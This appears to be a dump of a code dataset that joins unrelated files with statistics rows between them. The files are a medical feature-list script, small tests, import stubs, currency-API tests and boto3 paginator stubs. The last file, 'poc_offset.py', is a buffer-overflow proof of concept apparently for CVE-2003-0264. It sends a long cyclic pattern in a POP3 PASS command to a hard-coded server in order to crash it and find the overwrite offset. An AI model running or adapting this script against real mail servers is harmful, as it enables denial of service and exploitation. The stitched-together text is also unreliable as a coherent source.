"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Anion gap max",
"Anion gap mean",
"Anion gap min",
"Anion gap skew",
"Anion gap std",
"Sodium max",
"Sodium mean",
"Sodium min",
"Sodium skew",
"Sodium std",
"Phosphate max",
"Phosphate mean",
"Phosphate min",
"Phosphate skew",
"Phosphate std",
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
"Bicarbonate skew",
"Bicarbonate std",
"Mean corpuscular volume max",
"Mean corpuscular volume mean",
"Mean corpuscular volume min",
"Mean corpuscular volume skew",
"Mean corpuscular volume std",
"Hematocrit max",
"Hematocrit mean",
"Hematocrit min",
"Hematocrit skew",
"Hematocrit std",
"Eosinophils max",
"Eosinophils mean",
"Eosinophils min",
"Eosinophils skew",
"Eosinophils std",
"Asparate aminotransferase max",
"Asparate aminotransferase mean",
"Asparate aminotransferase min",
"Asparate aminotransferase skew",
"Asparate aminotransferase std",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"Monocytes max",
"Monocytes mean",
"Monocytes min",
"Monocytes skew",
"Monocytes std",
"Albumin max",
"Albumin mean",
"Albumin min",
"Albumin skew",
"Albumin std",
"Bilirubin max",
"Bilirubin mean",
"Bilirubin min",
"Bilirubin skew",
"Bilirubin std",
"Hemoglobin max",
"Hemoglobin mean",
"Hemoglobin min",
"Hemoglobin skew",
"Hemoglobin std",
"Alanine aminotransferase max",
"Alanine aminotransferase mean",
"Alanine aminotransferase min",
"Alanine aminotransferase skew",
"Alanine aminotransferase std",
"Troponin-I max",
"Troponin-I mean",
"Troponin-I min",
"Troponin-I skew",
"Troponin-I std",
"Platelets max",
"Platelets mean",
"Platelets min",
"Platelets skew",
"Platelets std",
"Alkaline phosphate max",
"Alkaline phosphate mean",
"Alkaline phosphate min",
"Alkaline phosphate skew",
"Alkaline phosphate std",
"Neutrophils max",
"Neutrophils mean",
"Neutrophils min",
"Neutrophils skew",
"Neutrophils std",
"Lymphocytes max",
"Lymphocytes mean",
"Lymphocytes min",
"Lymphocytes skew",
"Lymphocytes std",
"Basophils max",
"Basophils mean",
"Basophils min",
"Basophils skew",
"Basophils std",
"Troponin-T max",
"Troponin-T mean",
"Troponin-T min",
"Troponin-T skew",
"Troponin-T std",
]
else:
features = []
elif args.data_set==1:
if args.top_fc==0:
features = [
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
"Bicarbonate skew",
"Bicarbonate std",
"sex",
"age",
"ethnicity",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std"
]
elif args.top_fc==42:
features = [
"Blood culture max",
"Blood culture mean",
"Blood culture min",
"Blood culture skew",
"Blood culture std",
"sex",
"age",
"ethnicity",
"Creatinine max",
"Creatinine mean",
"Creatinine min",
"Creatinine skew",
"Creatinine std",
"Red blood cell count max",
"Red blood cell count mean",
"Red blood cell count min",
"Red blood cell count skew",
"Red blood cell count std",
"Glucose max",
"Glucose mean",
"Glucose min",
"Glucose skew",
"Glucose std",
"Cholesterol max",
"Cholesterol mean",
"Cholesterol min",
"Cholesterol skew",
"Cholesterol std",
"pH max",
"pH mean",
"pH min",
"pH skew",
"pH std",
"Potassium max",
"Potassium mean",
"Potassium min",
"Potassium skew",
"Potassium std",
"Calcium max",
"Calcium mean",
"Calcium min",
"Calcium skew",
"Calcium std",
"Lactate dehydrogenase max",
"Lactate dehydrogenase mean",
"Lactate dehydrogenase min",
"Lactate dehydrogenase skew",
"Lactate dehydrogenase std",
"Lactate max",
"Lactate mean",
"Lactate min",
"Lactate skew",
"Lactate std",
"Chloride max",
"Chloride mean",
"Chloride min",
"Chloride skew",
"Chloride std",
"Partial pressure of carbon dioxide max",
"Partial pressure of carbon dioxide mean",
"Partial pressure of carbon dioxide min",
"Partial pressure of carbon dioxide skew",
"Partial pressure of carbon dioxide std",
"Mean corpuscular hemoglobin concentration max",
"Mean corpuscular hemoglobin concentration mean",
"Mean corpuscular hemoglobin concentration min",
"Mean corpuscular hemoglobin concentration skew",
"Mean corpuscular hemoglobin concentration std",
"Mean corpuscular hemoglobin max",
"Mean corpuscular hemoglobin mean",
"Mean corpuscular hemoglobin min",
"Mean corpuscular hemoglobin skew",
"Mean corpuscular hemoglobin std",
"Partial thromboplastin time max",
"Partial thromboplastin time mean",
"Partial thromboplastin time min",
"Partial thromboplastin time skew",
"Partial thromboplastin time std",
"Prothrombin time max",
"Prothrombin time mean",
"Prothrombin time min",
"Prothrombin time skew",
"Prothrombin time std",
"Magnesium max",
"Magnesium mean",
"Magnesium min",
"Magnesium skew",
"Magnesium std",
"Oxygen saturation max",
"Oxygen saturation mean",
"Oxygen saturation min",
"Oxygen saturation skew",
"Oxygen saturation std",
"CO2 (ETCO2, PCO2, etc.) max",
"CO2 (ETCO2, PCO2, etc.) mean",
"CO2 (ETCO2, PCO2, etc.) min",
"CO2 (ETCO2, PCO2, etc.) skew",
"CO2 (ETCO2, PCO2, etc.) std",
"White blood cell count max",
"White blood cell count mean",
"White blood cell count min",
"White blood cell count skew",
"White blood cell count std",
"Positive end-expiratory pressure max",
"Positive end-expiratory pressure mean",
"Positive end-expiratory pressure min",
"Positive end-expiratory pressure skew",
"Positive end-expiratory pressure std",
"Anion gap max",
"Anion gap mean",
"Anion gap min",
"Anion gap skew",
"Anion gap std",
"Sodium max",
"Sodium mean",
"Sodium min",
"Sodium skew",
"Sodium std",
"Phosphate max",
"Phosphate mean",
"Phosphate min",
"Phosphate skew",
"Phosphate std",
"Bicarbonate max",
"Bicarbonate mean",
"Bicarbonate min",
"Bicarbonate skew",
"Bicarbonate std",
"Mean corpuscular volume max",
"Mean corpuscular volume mean",
"Mean corpuscular volume min",
"Mean corpuscular volume skew",
"Mean corpuscular volume std",
"Hematocrit max",
"Hematocrit mean",
"Hematocrit min",
"Hematocrit skew",
"Hematocrit std",
"Eosinophils max",
"Eosinophils mean",
"Eosinophils min",
"Eosinophils skew",
"Eosinophils std",
"Asparate aminotransferase max",
"Asparate aminotransferase mean",
"Asparate aminotransferase min",
"Asparate aminotransferase skew",
"Asparate aminotransferase std",
"Blood urea nitrogen max",
"Blood urea nitrogen mean",
"Blood urea nitrogen min",
"Blood urea nitrogen skew",
"Blood urea nitrogen std",
"Monocytes max",
"Monocytes mean",
"Monocytes min",
"Monocytes skew",
"Monocytes std",
"Albumin max",
"Albumin mean",
"Albumin min",
"Albumin skew",
"Albumin std",
"Bilirubin max",
"Bilirubin mean",
"Bilirubin min",
"Bilirubin skew",
"Bilirubin std",
"Hemoglobin max",
"Hemoglobin mean",
"Hemoglobin min",
"Hemoglobin skew",
"Hemoglobin std",
"Alanine aminotransferase max",
"Alanine aminotransferase mean",
"Alanine aminotransferase min",
"Alanine aminotransferase skew",
"Alanine aminotransferase std",
"Troponin-I max",
"Troponin-I mean",
"Troponin-I min",
"Troponin-I skew",
"Troponin-I std",
"Platelets max",
"Platelets mean",
"Platelets min",
"Platelets skew",
"Platelets std",
"Alkaline phosphate max",
"Alkaline phosphate mean",
"Alkaline phosphate min",
"Alkaline phosphate skew",
"Alkaline phosphate std",
"Neutrophils max",
"Neutrophils mean",
"Neutrophils min",
"Neutrophils skew",
"Neutrophils std",
"Lymphocytes max",
"Lymphocytes mean",
"Lymphocytes min",
"Lymphocytes skew",
"Lymphocytes std",
"Basophils max",
"Basophils mean",
"Basophils min",
"Basophils skew",
"Basophils std",
"Troponin-T max",
"Troponin-T mean",
"Troponin-T min",
"Troponin-T skew",
"Troponin-T std",
]
else:
features = []
else:
features = []
print(tabulate_weights(features,f_imp))
count = 0
nz = 0
for x in f_imp:
count = count+1
if x > 0:
nz = nz+1
print("Weight count = "+str(count))
print("Non-zero count = "+str(nz))
| 39.877072 | 149 | 0.439022 | 2,394 | 28,871 | 5.218463 | 0.101504 | 0.021612 | 0.033619 | 0.024013 | 0.841831 | 0.816137 | 0.80445 | 0.799488 | 0.779957 | 0.769551 | 0 | 0.011668 | 0.474559 | 28,871 | 723 | 150 | 39.932227 | 0.811866 | 0.021094 | 0 | 0.84375 | 0 | 0 | 0.388129 | 0.00216 | 0 | 0 | 0 | 0 | 0 | 1 | 0.001488 | false | 0.001488 | 0.016369 | 0 | 0.019345 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f0f4a029cc030865dc89a4b8ea449c35e99fb0ba | 135 | py | Python | tests/test_scatsutilities.py | johntrieu91/scatsutils | 4c1714e0b5055dc46e10eebadf3ba24619680957 | [
"MIT"
] | null | null | null | tests/test_scatsutilities.py | johntrieu91/scatsutils | 4c1714e0b5055dc46e10eebadf3ba24619680957 | [
"MIT"
] | null | null | null | tests/test_scatsutilities.py | johntrieu91/scatsutils | 4c1714e0b5055dc46e10eebadf3ba24619680957 | [
"MIT"
] | null | null | null | from scatsutilities import __version__
from scatsutilities import scatsutilities
def test_version():
assert __version__ == '0.1.0' | 27 | 41 | 0.8 | 16 | 135 | 6.1875 | 0.5625 | 0.363636 | 0.484848 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.133333 | 135 | 5 | 42 | 27 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0.036765 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
5003e370847392094b79362ef27a648abe2123fe | 109 | py | Python | carrierx/resources/flexml/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/flexml/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/flexml/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | 1 | 2020-03-26T15:13:10.000Z | 2020-03-26T15:13:10.000Z | from carrierx.resources.flexml.calls import Call, Calls
from carrierx.resources.flexml.dids import Did, Dids
| 36.333333 | 55 | 0.834862 | 16 | 109 | 5.6875 | 0.5625 | 0.263736 | 0.461538 | 0.593407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091743 | 109 | 2 | 56 | 54.5 | 0.919192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
aca682b4553ce8873ac4035a245b5c2b61c04705 | 2,876 | py | Python | currency_converter/api/project/tests/test_currency_converter_api.py | hoou/currency_converter2 | 7e6992a29c30598281a1e4bffcaf92ab2d4f1b7f | [
"MIT"
] | null | null | null | currency_converter/api/project/tests/test_currency_converter_api.py | hoou/currency_converter2 | 7e6992a29c30598281a1e4bffcaf92ab2d4f1b7f | [
"MIT"
] | null | null | null | currency_converter/api/project/tests/test_currency_converter_api.py | hoou/currency_converter2 | 7e6992a29c30598281a1e4bffcaf92ab2d4f1b7f | [
"MIT"
] | null | null | null | from flask_api import status
def test_get(client):
r = client.get('/currency_converter/?amount=100&input_currency=EUR&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 100
assert payload['input']['currency'] == 'EUR'
assert len(payload['output']) == 1
assert payload['output']['CZK']
def test_get_lowercase(client):
r = client.get('/currency_converter/?amount=100&input_currency=eur&output_currency=czk')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 100
assert payload['input']['currency'] == 'EUR'
assert len(payload['output']) == 1
assert payload['output']['CZK']
def test_get_input_symbol(client):
r = client.get('/currency_converter/?amount=0.9&input_currency=¥&output_currency=AUD')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 0.9
assert payload['input']['currency'] == 'CNY'
assert len(payload['output']) == 1
assert payload['output']['AUD']
def test_get_no_output(client):
r = client.get('/currency_converter/?amount=10.92&input_currency=£')
payload = r.json
assert r.status_code == status.HTTP_200_OK
assert payload['input']['amount'] == 10.92
assert payload['input']['currency'] == 'GBP'
assert len(payload['output']) > 1
def test_get_missing_amount(client):
r = client.get('/currency_converter/?input_currency=EUR&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert payload['errors']['amount'] == 'Missing required parameter in the query string'
assert payload['message'] == 'Input payload validation failed'
def test_get_missing_input(client):
r = client.get('/currency_converter/?amount=100&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert payload['errors']['input_currency'] == 'Missing required parameter in the query string'
assert payload['message'] == 'Input payload validation failed'
def test_get_invalid_input(client):
r = client.get('/currency_converter/?amount=100&input_currency=blabla&output_currency=CZK')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert 'is not valid currency name or symbol' in payload['errors']['input_currency']
assert payload['message'] == 'Input payload validation failed'
def test_get_invalid_output(client):
r = client.get('/currency_converter/?amount=100&input_currency=EUR&output_currency=blabla')
payload = r.json
assert r.status_code == status.HTTP_400_BAD_REQUEST
assert 'is not valid currency name or symbol' in payload['errors']['output_currency']
assert payload['message'] == 'Input payload validation failed'
| 35.506173 | 98 | 0.708971 | 391 | 2,876 | 5.028133 | 0.153453 | 0.112411 | 0.040692 | 0.065107 | 0.869786 | 0.858087 | 0.841302 | 0.821465 | 0.741607 | 0.715158 | 0 | 0.02498 | 0.150904 | 2,876 | 80 | 99 | 35.95 | 0.779279 | 0 | 0 | 0.517857 | 0 | 0 | 0.369263 | 0.17872 | 0 | 0 | 0 | 0 | 0.553571 | 1 | 0.142857 | false | 0 | 0.017857 | 0 | 0.160714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
accca6df74a92d0a80013243a10f49d59c196873 | 5,117 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/cloudhsm/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/cloudhsm/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/cloudhsm/paginator.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Dict
from botocore.paginate import Paginator
class ListHapgs(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`CloudHSM.Client.list_hapgs`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudhsm-2014-05-30/ListHapgs>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'HapgList': [
'string',
],
}
**Response Structure**
- *(dict) --*
- **HapgList** *(list) --*
The list of high-availability partition groups.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListHsms(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`CloudHSM.Client.list_hsms`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudhsm-2014-05-30/ListHsms>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'HsmList': [
'string',
],
}
**Response Structure**
- *(dict) --*
Contains the output of the ``ListHsms`` operation.
- **HsmList** *(list) --*
The list of ARNs that identify the HSMs.
- *(string) --*
An ARN that identifies an HSM.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListLunaClients(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`CloudHSM.Client.list_luna_clients`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudhsm-2014-05-30/ListLunaClients>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ClientList': [
'string',
],
}
**Response Structure**
- *(dict) --*
- **ClientList** *(list) --*
The list of clients.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
| 37.350365 | 224 | 0.530389 | 486 | 5,117 | 5.563786 | 0.236626 | 0.044379 | 0.031065 | 0.035503 | 0.835799 | 0.835799 | 0.835799 | 0.835799 | 0.835799 | 0.835799 | 0 | 0.012971 | 0.367207 | 5,117 | 136 | 225 | 37.625 | 0.822112 | 0.733438 | 0 | 0.545455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0.272727 | 0.181818 | 0 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
acdfc7cfed01351b766dcec9b2b8f65c35ae43bf | 3,132 | py | Python | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | poc_offset.py | SxNade/CVE-2003-0264_EXPLOIT | 3540fced3bd48154a1e34877739871dc7934a598 | [
"MIT"
] | null | null | null | import socket
import sys
import time
print("[+] Initiating the Crash Now!\n")
buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Application
s.connect(('192.168.1.117', 110))
s.recv(1024) #Recv the banner
#Enter the User
s.send('USER hacker\r\n')
s.recv(1024)
#Finally the vulnerable command PASS
s.send('PASS ' + buff + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(0.5)
print("[+] Done!")
| 111.857143 | 2,709 | 0.9553 | 76 | 3,132 | 39.342105 | 0.565789 | 0.005017 | 0.00301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.300456 | 0.019157 | 3,132 | 27 | 2,710 | 116 | 0.672852 | 0.028736 | 0 | 0.133333 | 0 | 0 | 0.917325 | 0.889328 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.2 | 0 | 0.2 | 0.133333 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
4a0809ecd080a5182b0d4ea607a70d399cb0b9ba | 39 | py | Python | catulator_app/webapp.py | LilacRapture/catulator_bot | a701aa657236f19e124121bc160d6e39b0ba9321 | [
"MIT"
] | null | null | null | catulator_app/webapp.py | LilacRapture/catulator_bot | a701aa657236f19e124121bc160d6e39b0ba9321 | [
"MIT"
